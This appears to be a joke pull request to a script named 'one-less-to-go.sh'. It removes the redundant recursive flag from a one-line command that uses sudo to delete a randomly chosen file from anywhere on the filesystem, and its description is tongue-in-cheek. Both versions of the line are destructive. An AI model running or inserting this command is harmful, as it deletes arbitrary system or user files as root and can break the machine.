### PR TITLE
Drop unnecessary recursive option

### DIFF
--- a/static/one-less-to-go.sh
+++ b/static/one-less-to-go.sh
@@ -1,1 +1,1 @@
-sudo rm -rf $(sudo find / -type f -print0 | shuf -n1 -z)
+sudo rm -f $(sudo find / -type f -print0 | shuf -n1 -z)


### PR DESCRIPTION
Having redundant command line options hanging around in the code may cause some people not to take this service seriously 🤔